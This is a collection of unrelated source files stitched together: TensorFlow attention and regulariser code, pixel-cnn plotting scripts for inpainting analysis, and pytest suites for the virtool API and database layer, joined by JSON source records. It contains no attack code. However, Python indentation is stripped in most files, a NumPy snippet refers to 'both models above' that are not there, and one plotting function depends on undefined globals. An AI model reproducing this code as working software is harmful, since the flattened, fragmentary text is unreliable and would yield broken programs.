if self._loss_type == "mse":
mu, sigma = mus, sigmas
mse = self.loss_fn(mu, target_y)
return mse, mse
elif self._loss_type == "log_prob":
mu, sigma = mus, sigmas
dist = tf.contrib.distributions.MultivariateNormalDiag(loc=mu, scale_diag=sigma)
loss = - dist.log_prob(target_y)
mse = self.loss_fn(mu, target_y)
            return loss, mse
else:
raise NameError("unknown output_dist_type")
@property
def _l2_regularization(self):
return tf.cast(
tf.reduce_sum(tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.REGULARIZATION_LOSSES)),
dtype=self._float_dtype)
@property
def _decoder_orthogonality_reg(self):
return self._orthogonality_reg
# (Copy from https://github.com/deepmind/leo, see copyright and original license in our LICENSE file.)
def get_orthogonality_regularizer(orthogonality_penalty_weight):
"""Returns the orthogonality regularizer."""
def orthogonality(weight):
"""Calculates the layer-wise penalty encouraging orthogonality."""
with tf.name_scope(None, "orthogonality", [weight]) as name:
w2 = tf.matmul(weight, weight, transpose_b=True)
wn = tf.norm(weight, ord=2, axis=1, keepdims=True) + 1e-32
correlation_matrix = w2 / tf.matmul(wn, wn, transpose_b=True)
matrix_size = correlation_matrix.get_shape().as_list()[0]
base_dtype = weight.dtype.base_dtype
identity = tf.eye(matrix_size, dtype=base_dtype)
weight_corr = tf.reduce_mean(
tf.math.squared_difference(correlation_matrix, identity))
return tf.multiply(
tf.cast(orthogonality_penalty_weight, base_dtype),
weight_corr,
name=name)
return orthogonality
# Attention modules
# (Adapted from https://github.com/deepmind/neural-processes, see copyright and original license in our LICENSE file.)
def dot_product_attention(q, k, v, normalise):
"""Computes dot product attention.
Args:
q: queries. tensor of shape [B,m,d_k].
k: keys. tensor of shape [B,n,d_k].
v: values. tensor of shape [B,n,d_v].
normalise: Boolean that determines whether weights sum to 1.
Returns:
tensor of shape [B,m,d_v].
"""
d_k = tf.shape(q)[-1]
scale = tf.sqrt(tf.cast(d_k, tf.float32))
    unnorm_weights = tf.einsum('jk,ik->ij', k, q) / scale  # [m,n]
if normalise:
weight_fn = tf.nn.softmax
else:
weight_fn = tf.sigmoid
weights = weight_fn(unnorm_weights)
rep = tf.einsum('ik,kj->ij', weights, v)
return rep
class Attention(snt.AbstractModule):
def __init__(self, config=None, name="attention"):
super(Attention, self).__init__(name=name)
self._float_dtype = tf.float32
self._int_dtype = tf.int32
self._rep = config['rep']
self._output_sizes = config['output_sizes']
self._att_type = config['att_type']
self._normalise = config['normalise']
self._scale = config['scale']
self._l2_penalty_weight = config['l2_penalty_weight']
self._nonlinearity = config['nonlinearity']
def _build(self, x1, x2, r):
if self._rep == 'identity':
k, q = (x1, x2)
elif self._rep == 'mlp':
# Pass through MLP
initializer = tf.initializers.glorot_uniform(dtype=self._float_dtype)
regularizer = tf.contrib.layers.l2_regularizer(self._l2_penalty_weight)
module = snt.nets.MLP(
self._output_sizes,
activation=self._nonlinearity,
use_bias=True,
initializers={"w": initializer},
)
k = snt.BatchApply(module, n_dims=1)(x1)
q = snt.BatchApply(module, n_dims=1)(x2)
else:
raise NameError("'rep' not among ['identity','mlp']")
if self._att_type == 'dot_product':
rep = dot_product_attention(q, k, r, self._normalise)
else:
raise NameError(("'att_type' not among ['dot_product']"))
return rep
``` |
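A NumPy sketch of the kernel-weighted functional update that both models above apply at every iteration, r(x) <- r(x) + alpha * sum_i k(x, x_i) u_i, with the squared-exponential kernel (all parameter values are placeholders):
```python
# Hypothetical NumPy version of squared_exponential_kernel plus one functional update step.
import numpy as np

def se_update(querys, keys, updates, alpha=1.0, sigma=1.0, lengthscale=1.0):
    # querys: [m, d], keys: [n, d], updates: [n, dim_reprs]
    sq_norm = np.sum((keys[:, None, :] - querys[None, :, :]) ** 2, axis=-1)  # [n, m]
    k = sigma ** 2 * np.exp(-sq_norm / (2.0 * lengthscale ** 2))             # [n, m]
    return alpha * np.einsum("kq,kv->qv", k, updates)                        # [m, dim_reprs]

r = np.zeros((5, 64))                                                        # r_0(x) = 0 at 5 query points
r += se_update(np.random.rand(5, 1), np.random.rand(7, 1), np.random.rand(7, 64))
```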
{
"source": "jinxu06/pixel-cnn",
"score": 2
} |
#### File: jinxu06/pixel-cnn/analyze.py
```python
import numpy as np
import os
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import imageio
from utils import KL_divergence
plt.style.use("ggplot")
import cv2
def find_contour(mask):
contour = np.zeros_like(mask)
h, w = mask.shape
for y in range(h):
for x in range(w):
if mask[y, x] > 0:
lower_bound = max(y-1, 0)
upper_bound = min(y+1, h-1)
left_bound = max(x-1, 0)
right_bound = min(x+1, w-1)
nb = mask[lower_bound:upper_bound+1, left_bound:right_bound+1]
if np.min(nb) == 0:
contour[y, x] = 1
return contour
def load_records(dir, label):
path = os.path.join(dir, "inpainting-record-{0}.npz".format(label))
d = np.load(path)
params = {}
params['num_images'] = d['dis'].shape[3]
params['num_pixels'] = d['dis'].shape[0]
return d['img'].astype(np.uint8), d['dis'], d['smp'], d['ms'], params
def get_image_record(records, image_id, t="image", dist_type="combine"):
img, dis, smp, ms, params = records
if t=='image':
return img[:, image_id, :, :, :]
elif t=='dist':
if dist_type=='forward':
return dis[:, :, 0, image_id, :]
elif dist_type=='backward':
return dis[:, :, 1, image_id, :]
elif dist_type=='combine':
return dis[:, :, 2, image_id, :]
elif dist_type=='prior':
return dis[:, :, 3, image_id, :]
else:
raise Exception(t+" type not found")
elif t=='sample':
return smp[:, image_id, :]
elif t=='mask':
return ms[image_id, :, :]
else:
raise Exception(t+" type not found")
def analyze_record(records, image_id):
_, _, _, _, params = records
num_images = params['num_images']
assert image_id < num_images, "image_id too large"
num_pixels = params['num_pixels']
images = get_image_record(records, image_id, t="image")
forward = get_image_record(records, image_id, t="dist", dist_type="forward")
backward = get_image_record(records, image_id, t="dist", dist_type="backward")
combine = get_image_record(records, image_id, t="dist", dist_type="combine")
prior = get_image_record(records, image_id, t="dist", dist_type="prior")
sample = get_image_record(records, image_id, t="sample")
cur_mask = get_image_record(records, image_id, t="mask")
for p in range(num_pixels):
cur_image = images[p]
cur_forward_dis = forward[p]
cur_backward_dis = backward[p]
cur_combine_dis = combine[p]
cur_prior_dis = prior[p]
cur_sample = sample[p]
plot(cur_forward_dis, cur_backward_dis, cur_combine_dis, cur_prior_dis, cur_image, cur_sample, cur_mask, pid=p)
def plot(forward_dist, backward_dist, combine_dist, prior_dist, image, sample, mask, pid):
fig = plt.figure(figsize=(8,8))
ax = fig.add_subplot(2,2,1)
    contour = 1-find_contour(mask)[:, :, None]
contour[contour<1] = 0.8
image = image * contour
ax.imshow(image.astype(np.uint8))
ax.axis("off")
# Red channel
b = 0
ax = fig.add_subplot(2,2,2)
ax.plot(np.arange(256), forward_dist[b], label="Forward KL={0:.2f}".format(KL_divergence(combine_dist[b], forward_dist[b]+1e-5)))
ax.plot(np.arange(256), backward_dist[b], label="Backward KL={0:.2f}".format(KL_divergence(combine_dist[b], backward_dist[b]+1e-5)))
ax.plot(np.arange(256), combine_dist[b], label="Combine KL={0:.2f}".format(KL_divergence(combine_dist[b], combine_dist[b]+1e-5)))
ax.plot(np.arange(256), prior_dist[b], label="Prior KL={0:.2f}".format(KL_divergence(combine_dist[b], prior_dist[b]+1e-5)))
ax.plot([sample[b]], [0.1], '-o', c='green', markersize=8)
ax.legend(loc=0)
ax.set_xlabel("red color code (8bit)")
ax.set_ylabel("density")
ax.set_ylim(0., 0.2)
# Green channel
b = 1
ax = fig.add_subplot(2,2,3)
ax.plot(np.arange(256), forward_dist[b], label="Forward KL={0:.2f}".format(KL_divergence(combine_dist[b], forward_dist[b]+1e-5)))
ax.plot(np.arange(256), backward_dist[b], label="Backward KL={0:.2f}".format(KL_divergence(combine_dist[b], backward_dist[b]+1e-5)))
ax.plot(np.arange(256), combine_dist[b], label="Combine KL={0:.2f}".format(KL_divergence(combine_dist[b], combine_dist[b]+1e-5)))
ax.plot(np.arange(256), prior_dist[b], label="Prior KL={0:.2f}".format(KL_divergence(combine_dist[b], prior_dist[b]+1e-5)))
ax.plot([sample[b]], [0.1], '-o', c='green', markersize=8)
ax.legend(loc=0)
ax.set_xlabel("green color code (8bit)")
ax.set_ylabel("density")
ax.set_ylim(0., 0.2)
# Blue channel
b = 2
ax = fig.add_subplot(2,2,4)
ax.plot(np.arange(256), forward_dist[b], label="Forward KL={0:.2f}".format(KL_divergence(combine_dist[b], forward_dist[b]+1e-5)))
ax.plot(np.arange(256), backward_dist[b], label="Backward KL={0:.2f}".format(KL_divergence(combine_dist[b], backward_dist[b]+1e-5)))
ax.plot(np.arange(256), combine_dist[b], label="Combine KL={0:.2f}".format(KL_divergence(combine_dist[b], combine_dist[b]+1e-5)))
ax.plot(np.arange(256), prior_dist[b], label="Prior KL={0:.2f}".format(KL_divergence(combine_dist[b], prior_dist[b]+1e-5)))
ax.plot([sample[b]], [0.1], '-o', c='green', markersize=8)
ax.legend(loc=0)
ax.set_xlabel("blue color code (8bit)")
ax.set_ylabel("density")
ax.set_ylim(0., 0.2)
plt.tight_layout()
fig.savefig("plots-{0}/plot-{1}-{2}.png".format(exp_label, image_id, str(pid).zfill(4))) #, dpi='figure')
plt.close()
def make_movie(dir, duration=0.5, name='movie', frame_step=1):
images = []
dirpath, dirnames, filenames = next(os.walk(dir))
filenames = sorted(list(filter(lambda x: x.endswith(".png"), filenames)))
filenames = filenames[::frame_step]
for f in filenames:
if ".png" in f:
images.append(imageio.imread(os.path.join(dir, f)))
imageio.mimsave(os.path.join(dir, "{0}.gif".format(name)), images, "GIF", duration=duration)
image_id = 0
exp_label = "celeba-hr-half"
DATA_DIR = "/Users/Aaron-MAC/Code/ImageInpainting"
#DATA_DIR = "/data/ziz/jxu"
# records = load_records(DATA_DIR, exp_label)
# if not os.path.exists("plots-{0}".format(exp_label)):
# os.makedirs("plots-{0}".format(exp_label))
#
# analyze_record(records, image_id)
make_movie("plots-{0}".format(exp_label), 0.5, 'reduce-movie-{0}-{1}'.format(exp_label, image_id), frame_step=10)
```
#### File: jinxu06/pixel-cnn/diff.py
```python
import numpy as np
from PIL import Image
from utils import *
from evaluation import *
def find_contour(mask):
contour = np.zeros_like(mask)
h, w = mask.shape
for y in range(h):
for x in range(w):
if mask[y, x] > 0:
lower_bound = max(y-1, 0)
upper_bound = min(y+1, h-1)
left_bound = max(x-1, 0)
right_bound = min(x+1, w-1)
nb = mask[lower_bound:upper_bound+1, left_bound:right_bound+1]
if np.min(nb) == 0:
contour[y, x] = 1
return contour
def tile_plot(imgs, file_path="../plots/test.png", display_size=None):
if display_size is None:
s = int(np.sqrt(imgs.shape[0]))
display_size = (s, s)
img = Image.fromarray(tile_images(imgs.astype(np.uint8), size=display_size), 'RGB')
img.save(file_path)
#mgen = mk.CenterMaskGenerator(32, 32, 0.5)
mgen = mk.CrossMaskGenerator(64, 64, (28, 38, 2, 62), (5, 59, 28, 36))
mask = mgen.gen(1)[0]
contour = find_contour(mask)[:, :, None]
data = np.load("psnr-cross-gan.npz")
all_completed = data['comp']
ground_truth = data['ori']
delta = np.abs(np.mean(all_completed, axis=0) - ground_truth)
delta += contour * 100
tile_plot(delta, "../plots1/celeba-cross-gan.png")
``` |
{
"source": "jinxuchen/virtool",
"score": 2
} |
#### File: tests/caches/test_db.py
```python
import pytest
from aiohttp.test_utils import make_mocked_coro
import virtool.caches.db
import virtool.utils
@pytest.fixture
def create_result(static_time, trim_parameters):
return {
"created_at": static_time.datetime,
"files": [],
"hash": "68b60be51a667882d3aaa02a93259dd526e9c990",
"legacy": False,
"paired": False,
"parameters": trim_parameters,
"program": "skewer-0.2.2",
"ready": False,
"sample": {
"id": "foo"
}
}
@pytest.fixture
def trim_parameters():
return {
"end_quality": "20",
"mode": "pe",
"max_error_rate": "0.1",
"max_indel_rate": "0.03",
"max_length": None,
"mean_quality": "25",
"min_length": "20"
}
def test_calculate_cache_hash(trim_parameters):
hashed = virtool.caches.db.calculate_cache_hash(trim_parameters)
assert hashed == "68b60be51a667882d3aaa02a93259dd526e9c990"
@pytest.mark.parametrize("paired", [True, False], ids=["paired", "unpaired"])
def test_create(paired, dbs, test_random_alphanumeric, create_result, trim_parameters):
"""
Test that the function works with default keyword arguments and when `paired` is either `True` or `False`.
"""
cache_id = virtool.caches.db.create(dbs, "foo", trim_parameters, paired)
assert dbs.caches.find_one() == {
**create_result,
"_id": test_random_alphanumeric.last_choice,
"paired": paired
}
assert cache_id == test_random_alphanumeric.last_choice
def test_create_legacy(dbs, test_random_alphanumeric, create_result, trim_parameters):
"""
Test that the function works when the `legacy` keyword argument is `True` instead of the default `False`.
"""
cache_id = virtool.caches.db.create(dbs, "foo", trim_parameters, False, legacy=True)
assert dbs.caches.find_one() == {
**create_result,
"_id": test_random_alphanumeric.last_choice,
"legacy": True
}
assert cache_id == test_random_alphanumeric.last_choice
def test_create_program(dbs, test_random_alphanumeric, create_result, trim_parameters):
"""
Test that the function works with a non-default trimming program keyword argument
(trimmomatic-0.2.3 instead of skewer-0.2.2).
"""
cache_id = virtool.caches.db.create(dbs, "foo", trim_parameters, False, program="trimmomatic-0.2.3")
assert dbs.caches.find_one({"_id": test_random_alphanumeric.last_choice}) == {
**create_result,
"_id": test_random_alphanumeric.last_choice,
"program": "trimmomatic-0.2.3"
}
assert cache_id == test_random_alphanumeric.last_choice
def test_create_duplicate(dbs, test_random_alphanumeric, create_result, trim_parameters):
"""
Test that the function handles duplicate document ids smoothly. The function should retry with a new id.
"""
dbs.caches.insert_one({"_id": test_random_alphanumeric.next_choice[:8].lower()})
cache_id = virtool.caches.db.create(dbs, "foo", trim_parameters, False)
assert cache_id == "u3cuwaoq"
assert dbs.caches.find_one({"_id": test_random_alphanumeric.last_choice}) == {
**create_result,
"_id": test_random_alphanumeric.last_choice
}
@pytest.mark.parametrize("exists", [True, False])
async def test_get(exists, dbi):
"""
Test that the function returns a cache document when it exists and returns `None` when it does not.
"""
if exists:
await dbi.caches.insert_one({"_id": "foo"})
result = await virtool.caches.db.get(dbi, "foo")
if exists:
assert result == {"id": "foo"}
return
assert result is None
@pytest.mark.parametrize("exception", [False, True])
async def test_remove(exception, dbi):
app = {
"db": dbi,
"run_in_thread": make_mocked_coro(raise_exception=FileNotFoundError) if exception else make_mocked_coro(),
"settings": {
"data_path": "/foo"
}
}
await dbi.caches.insert_one({"_id": "baz"})
await virtool.caches.db.remove(app, "baz")
assert await dbi.caches.count() == 0
app["run_in_thread"].assert_called_with(
virtool.utils.rm,
"/foo/caches/baz",
True
)
```
#### File: tests/fixtures/jobs.py
```python
import pytest
@pytest.fixture
def test_job(static_time):
return {
"_id": "4c530449",
"user": {
"id": "igboyes"
},
"proc": 10,
"mem": 16,
"task": "build_index",
"args": {
"name": None,
"username": "igboyes",
"sample_id": "1e01a382",
"analysis_id": "e410429b",
"algorithm": "nuvs",
"index_id": "465428b0"
},
"status": [
{
"error": None,
"timestamp": static_time.datetime,
"state": "waiting",
"stage": None,
"progress": 0
},
{
"error": None,
"timestamp": static_time.datetime,
"state": "running",
"stage": None,
"progress": 0
},
{
"error": None,
"timestamp": static_time.datetime,
"state": "running",
"stage": "mk_analysis_dir",
"progress": 0.091
},
{
"error": None,
"timestamp": static_time.datetime,
"state": "complete",
"stage": "import_results",
"progress": 1.0
}
]
}
```
#### File: tests/history/test_api.py
```python
import pytest
from operator import itemgetter
import virtool.otus.db
import virtool.otus.utils
import virtool.history.utils
async def test_find(spawn_client, test_changes, static_time):
"""
    Test that a list of processed change documents is returned with a ``200`` status.
"""
client = await spawn_client(authorize=True)
await client.db.history.insert_many(test_changes)
resp = await client.get("/api/history")
assert resp.status == 200
resp_json = await resp.json()
resp_json["documents"] = sorted(resp_json["documents"], key=itemgetter("id"))
assert resp_json == {
"found_count": 3,
"page": 1,
"page_count": 1,
"per_page": 25,
"total_count": 3,
"documents": sorted([
{
"description": "Edited Prunus virus E",
"id": "6116cba1.1",
"index": {
"id": "unbuilt",
"version": "unbuilt"
},
"method_name": "edit",
"created_at": static_time.iso,
"user": {
"id": "test"
},
"otu": {
"id": "6116cba1",
"name": "Prunus virus F",
"version": 1
},
"reference": {
"id": "hxn167"
}
},
{
"description": "Edited Prunus virus E",
"id": "foobar.1",
"index": {
"id": "unbuilt",
"version": "unbuilt"
},
"method_name": "edit",
"created_at": static_time.iso,
"user": {
"id": "test"
},
"otu": {
"id": "6116cba1",
"name": "Prunus virus F",
"version": 1
},
"reference": {
"id": "hxn167"
}
},
{
"description": "Edited Prunus virus E",
"id": "foobar.2",
"index": {
"id": "unbuilt",
"version": "unbuilt"
},
"method_name": "edit",
"created_at": static_time.iso,
"user": {
"id": "test"
},
"otu": {
"id": "6116cba1",
"name": "Prunus virus F",
"version": 1
},
"reference": {
"id": "hxn167"
}
}
], key=itemgetter("id"))
}
@pytest.mark.parametrize("error", [None, "404"])
async def test_get(error, resp_is, spawn_client, test_changes, static_time):
"""
Test that a specific history change can be retrieved by its change_id.
"""
client = await spawn_client(authorize=True)
await client.db.history.insert_many(test_changes)
change_id = "baz.1" if error else "6116cba1.1"
resp = await client.get("/api/history/" + change_id)
if error:
assert await resp_is.not_found(resp)
return
assert resp.status == 200
assert await resp.json() == {
"description": "Edited Prunus virus E",
"diff": [
["change", "abbreviation", ["PVF", ""]],
["change", "name", ["Prunus virus F", "Prunus virus E"]],
["change", "version", [0, 1]]
],
"id": "6116cba1.1",
"index": {
"id": "unbuilt",
"version": "unbuilt"
},
"method_name": "edit",
"created_at": static_time.iso,
"user": {
"id": "test"
},
"otu": {
"id": "6116cba1",
"name": "Prunus virus F",
"version": 1
},
"reference": {
"id": "hxn167"
}
}
@pytest.mark.parametrize("error", [None, "404"])
@pytest.mark.parametrize("remove", [False, True])
async def test_revert(error, remove, create_mock_history, spawn_client, check_ref_right, resp_is):
"""
Test that a valid request results in a reversion and a ``204`` response.
"""
client = await spawn_client(authorize=True)
await create_mock_history(remove)
change_id = "foo.1" if error else "6116cba1.2"
resp = await client.delete("/api/history/" + change_id)
if error:
assert await resp_is.not_found(resp)
return
if not check_ref_right:
assert await resp_is.insufficient_rights(resp)
return
assert resp.status == 204
assert await virtool.otus.db.join(client.db, "6116cba1") == {
"_id": "6116cba1",
"abbreviation": "TST",
"imported": True,
"isolates": [
{
"default": True,
"id": "cab8b360",
"sequences": [
{
"_id": "KX269872",
"definition": "Prunus virus F isolate 8816-s2 "
"segment RNA2 polyprotein 2 gene, "
"complete cds.",
"host": "sweet cherry",
"isolate_id": "cab8b360",
"sequence": "TGTTTAAGAGATTAAACAACCGCTTTC",
"otu_id": "6116cba1",
"segment": None
}
],
"source_name": "8816-v2",
"source_type": "isolate"
}
],
"reference": {
"id": "hxn167"
},
"last_indexed_version": 0,
"lower_name": "prunus virus f",
"name": "Prunus virus F",
"verified": False,
"schema": [],
"version": 1
}
```
#### File: tests/history/test_utils.py
```python
import pytest
import virtool.history.utils
def test_calculate_diff(test_otu_edit):
"""
Test that a diff is correctly calculated. Should work since the tested function is a very light wrapper for the
dict differ function.
"""
old, new = test_otu_edit
diff = virtool.history.utils.calculate_diff(old, new)
    assert sorted(diff) == sorted([
        ("change", "name", ("Prunus virus F", "Prunus virus E")),
        ("change", "abbreviation", ("PVF", "")),
        ("change", "version", (0, 1))
    ])
@pytest.mark.parametrize("document,description", [
# Name and abbreviation.
({
"name": "Tobacco mosaic virus",
"abbreviation": "TMV"
}, "Created Tobacco mosaic virus (TMV)"),
# Name only.
({
"name": "Tobacco mosaic virus",
"abbreviation": "",
}, "Created Tobacco mosaic virus")
])
def test_compose_create_description(document, description):
assert virtool.history.utils.compose_create_description(document) == description
@pytest.mark.parametrize("name,abbreviation,old_abbreviation,schema,description", [
# Only change name.
(
"Tobacco mosaic virus", None, "", None,
"Changed name to Tobacco mosaic virus"
),
# Change name and add an abbreviation where none was defined before.
(
"Tobacco mosaic virus", "TMV", "", None,
"Changed name to Tobacco mosaic virus and added abbreviation TMV"
),
# Change both name and abbreviation.
(
"Tobacco mosaic virus", "THG", "TMV", None,
"Changed name to Tobacco mosaic virus and changed abbreviation to THG"
),
# Change name and remove abbreviation.
(
"Tobacco mosaic virus", "", "TMV", None,
"Changed name to Tobacco mosaic virus and removed abbreviation TMV"
),
# Add an abbreviation where none was defined before.
(
None, "THG", "", None,
"Added abbreviation THG"
),
# Only change abbreviation.
(
None, "THG", "TMV", None,
"Changed abbreviation to THG"
),
# Only modify schema.
(
None, None, "", "schema",
"Modified schema"
),
# Modify schema and change name.
(
"Tobacco mosaic virus", None, "", "schema",
"Changed name to Tobacco mosaic virus and modified schema"
),
# Modify schema, change name, and add abbreviation
])
def test_compose_edit_description(name, abbreviation, old_abbreviation, schema, description):
assert virtool.history.utils.compose_edit_description(name, abbreviation, old_abbreviation, schema) == description
```
#### File: tests/references/test_api.py
```python
import pytest
from aiohttp.test_utils import make_mocked_coro
async def test_get_release(mocker, spawn_client, id_exists, resp_is):
client = await spawn_client(authorize=True)
m_fetch_and_update_release = mocker.patch(
"virtool.references.db.fetch_and_update_release",
make_mocked_coro({
"_id": "release"
})
)
resp = await client.get("/api/refs/foo/release")
id_exists.assert_called_with(
client.db.references,
"foo"
)
if not id_exists:
assert await resp_is.not_found(resp)
return
assert resp.status == 200
assert await resp.json() == {
"_id": "release"
}
m_fetch_and_update_release.assert_called_with(
client.app,
"foo"
)
@pytest.mark.parametrize("empty", [True, False])
async def test_list_updates(empty, mocker, spawn_client, id_exists, resp_is):
client = await spawn_client(authorize=True)
m_get_one_field = mocker.patch(
"virtool.db.utils.get_one_field",
make_mocked_coro(None if empty else [
"a",
"b",
"c"
])
)
resp = await client.get("/api/refs/foo/updates")
id_exists.assert_called_with(
client.db.references,
"foo"
)
if not id_exists:
assert await resp_is.not_found(resp)
return
assert resp.status == 200
    assert await resp.json() == ([] if empty else [
        "c",
        "b",
        "a"
    ])
m_get_one_field.assert_called_with(
client.db.references,
"updates",
"foo"
)
@pytest.mark.parametrize("error", [None, "400"])
async def test_update(error, mocker, spawn_client, check_ref_right, id_exists, resp_is, static_time):
client = await spawn_client(authorize=True)
if error != "400":
await client.db.references.insert_one({
"_id": "foo",
"release": {
"id": "bar"
}
})
m_process = mocker.patch("virtool.references.db.UpdateRemoteReferenceProcess")
m_register = mocker.patch(
"virtool.processes.db.register",
make_mocked_coro({
"id": "process"
})
)
m_spawn = mocker.patch("aiojobs.aiohttp.spawn", make_mocked_coro())
m_update = mocker.patch(
"virtool.references.db.update",
make_mocked_coro((
{
"id": "bar"
},
{
"id": "update",
"created_at": "time"
}
))
)
resp = await client.post("/api/refs/foo/updates")
id_exists.assert_called_with(
client.db.references,
"foo"
)
if not id_exists:
assert await resp_is.not_found(resp)
return
if not check_ref_right:
assert await resp_is.insufficient_rights(resp)
return
if error == "400":
assert await resp_is.bad_request(resp, "Target release does not exist")
return
m_register.assert_called_with(
client.db,
"update_remote_reference",
context={
"created_at": static_time.datetime,
"ref_id": "foo",
"release": {
"id": "bar"
},
"user_id": "test"
}
)
m_spawn.assert_called_with(
mocker.ANY,
m_process().run()
)
m_update.assert_called_with(
client.app,
static_time.datetime,
"process",
"foo",
{
"id": "bar"
},
"test"
)
assert resp.status == 201
assert await resp.json() == {
"id": "update",
"created_at": "time"
}
async def test_find_indexes(mocker, spawn_client, id_exists, md_proxy, resp_is):
client = await spawn_client(authorize=True)
body = {
"documents": ["a", "b", "c"]
}
m_find = mocker.patch("virtool.indexes.db.find", make_mocked_coro(body))
resp = await client.get("/api/refs/foo/indexes")
if not id_exists:
assert await resp_is.not_found(resp)
return
assert resp.status == 200
assert await resp.json() == body
m_find.assert_called_with(
client.db,
md_proxy(),
ref_id="foo"
)
async def test_create(mocker, spawn_client, test_random_alphanumeric, static_time):
client = await spawn_client(authorize=True, permissions=["create_ref"])
default_source_type = [
"strain",
"isolate"
]
client.settings["default_source_types"] = default_source_type
data = {
"name": "Test Viruses",
"description": "A bunch of viruses used for testing",
"data_type": "genome",
"organism": "virus"
}
m_get_otu_count = mocker.patch("virtool.references.db.get_otu_count", make_mocked_coro(22))
m_get_unbuilt_count = mocker.patch("virtool.references.db.get_unbuilt_count", make_mocked_coro(5))
resp = await client.post("/api/refs", data)
assert resp.status == 201
assert resp.headers["Location"] == "/api/refs/" + test_random_alphanumeric.history[0]
assert await resp.json() == dict(
data,
id=test_random_alphanumeric.history[0],
created_at="2015-10-06T20:00:00Z",
user={
"id": "test"
},
users=[{
"build": True,
"id": "test",
"modify": True,
"modify_otu": True,
"remove": True
}],
groups=[],
contributors=[],
internal_control=None,
restrict_source_types=False,
otu_count=22,
unbuilt_change_count=5,
source_types=default_source_type,
latest_build=None
)
m_get_otu_count.assert_called_with(
client.db,
test_random_alphanumeric.history[0]
)
m_get_unbuilt_count.assert_called_with(
client.db,
test_random_alphanumeric.history[0]
)
@pytest.mark.parametrize("control_exists", [True, False])
@pytest.mark.parametrize("control_id", [None, "", "baz"])
async def test_edit(control_exists, control_id, mocker, spawn_client, check_ref_right, id_exists, resp_is):
client = await spawn_client(authorize=True)
m_find_one_and_update = mocker.patch.object(
client.db.references,
"find_one_and_update",
make_mocked_coro({
"_id": "foo",
"name": "Test Reference"
})
)
m_get_computed = mocker.patch(
"virtool.references.db.get_computed",
make_mocked_coro({
"computed": True
})
)
m_get_internal_control = mocker.patch(
"virtool.references.db.get_internal_control",
make_mocked_coro({"id": "baz"} if control_exists else None)
)
data = {
"name": "Tester",
"description": "This is a test reference."
}
if control_id is not None:
data["internal_control"] = control_id
resp = await client.patch("/api/refs/foo", data)
id_exists.assert_called_with(
client.db.references,
"foo"
)
if not id_exists:
assert await resp_is.not_found(resp)
return
check_ref_right.assert_called_with(
mocker.ANY,
"foo",
"modify"
)
assert check_ref_right.called_with_req()
if not check_ref_right:
assert await resp_is.insufficient_rights(resp)
return
expected_internal_control = None
if control_id and control_exists:
expected_internal_control = {
"id": "baz"
}
update = {
"description": "This is a test reference.",
"name": "Tester"
}
if control_id is not None:
update["internal_control"] = expected_internal_control
m_find_one_and_update.assert_called_with(
{
"_id": "foo"
},
{
"$set": update
}
)
m_get_computed.assert_called_with(
client.db,
"foo",
control_id
)
if control_id:
m_get_internal_control.assert_called_with(
client.db,
"baz",
"foo"
)
@pytest.mark.parametrize("error", [None, "400_dne", "400_exists", "404"])
@pytest.mark.parametrize("field", ["group", "user"])
async def test_add_group_or_user(error, field, spawn_client, check_ref_right, resp_is, static_time):
"""
Test that the group or user is added to the reference when no error condition exists.
Test for the following error conditions:
- 404: ref does not exist
- 400_exists: group or user already exists in ref
- 400_dne: group or user does not exist
"""
client = await spawn_client(authorize=True)
document = {
"_id": "foo",
"groups": [],
"users": []
}
# Add group and user subdocuments to make sure a 400 is returned complaining about the user or group already
# existing in the ref.
if error == "400_exists":
document["groups"].append({
"id": "tech"
})
document["users"].append({
"id": "fred"
})
    # Add group and user documents to their collections unless we want to trigger a 400 complaining about the user
    # or group not existing.
if error != "400_dne":
await client.db.groups.insert_one({
"_id": "tech"
})
await client.db.users.insert_one({
"_id": "fred",
"identicon": "foo_identicon"
})
# Don't insert the ref document if we want to trigger a 404.
if error != "404":
await client.db.references.insert_one(document)
url = "/api/refs/foo/{}s".format(field)
resp = await client.post(url, {
field + "_id": "tech" if field == "group" else "fred",
"modify": True
})
if error == "404":
assert await resp_is.not_found(resp)
return
if not check_ref_right:
assert await resp_is.insufficient_rights(resp)
return
if error == "400_dne":
assert await resp_is.bad_request(resp, "{} does not exist".format(field.capitalize()))
return
if error == "400_exists":
assert await resp_is.bad_request(resp, "{} already exists".format(field.capitalize()))
return
assert resp.status == 201
expected = {
"id": "tech" if field == "group" else "fred",
"created_at": static_time.iso,
"build": False,
"modify": True,
"modify_otu": False,
"remove": False
}
if field == "user":
expected["identicon"] = "foo_identicon"
assert await resp.json() == expected
@pytest.mark.parametrize("error", [None, "404_field", "404_ref"])
@pytest.mark.parametrize("field", ["group", "user"])
async def test_edit_group_or_user(error, field, spawn_client, check_ref_right, resp_is):
client = await spawn_client(authorize=True)
document = {
"_id": "foo",
"groups": [],
"users": []
}
if error != "404_field":
document["groups"].append({
"id": "tech",
"build": False,
"modify": False,
"modify_otu": False,
"remove": False
})
document["users"].append({
"id": "fred",
"build": False,
"modify": False,
"modify_otu": False,
"remove": False
})
if error != "404_ref":
await client.db.references.insert_one(document)
await client.db.users.insert_one({
"_id": "fred",
"identicon": "foo_identicon"
})
subdocument_id = "tech" if field == "group" else "fred"
url = "/api/refs/foo/{}s/{}".format(field, subdocument_id)
resp = await client.patch(url, {
"remove": True
})
if error:
assert await resp_is.not_found(resp)
return
if not check_ref_right:
assert await resp_is.insufficient_rights(resp)
return
assert resp.status == 200
expected = {
"id": subdocument_id,
"build": False,
"modify": False,
"modify_otu": False,
"remove": True
}
if field == "user":
expected["identicon"] = "foo_identicon"
assert await resp.json() == expected
assert await client.db.references.find_one() == {
"_id": "foo",
"groups": [{
"id": "tech",
"build": False,
"modify": False,
"modify_otu": False,
"remove": field == "group"
}],
"users": [{
"id": "fred",
"build": False,
"modify": False,
"modify_otu": False,
"remove": field == "user"
}]
}
@pytest.mark.parametrize("error", [None, "404_field", "404_ref"])
@pytest.mark.parametrize("field", ["group", "user"])
async def test_delete_group_or_user(error, field, spawn_client, check_ref_right, resp_is):
client = await spawn_client(authorize=True)
document = {
"_id": "foo",
"groups": [],
"users": []
}
if error != "404_field":
document["groups"].append({
"id": "tech",
"build": False,
"modify": False,
"modify_otu": False,
"remove": False
})
document["users"].append({
"id": "fred",
"build": False,
"modify": False,
"modify_otu": False,
"remove": False
})
if error != "404_ref":
await client.db.references.insert_one(document)
subdocument_id = "tech" if field == "group" else "fred"
url = "/api/refs/foo/{}s/{}".format(field, subdocument_id)
resp = await client.delete(url)
if error:
assert await resp_is.not_found(resp)
return
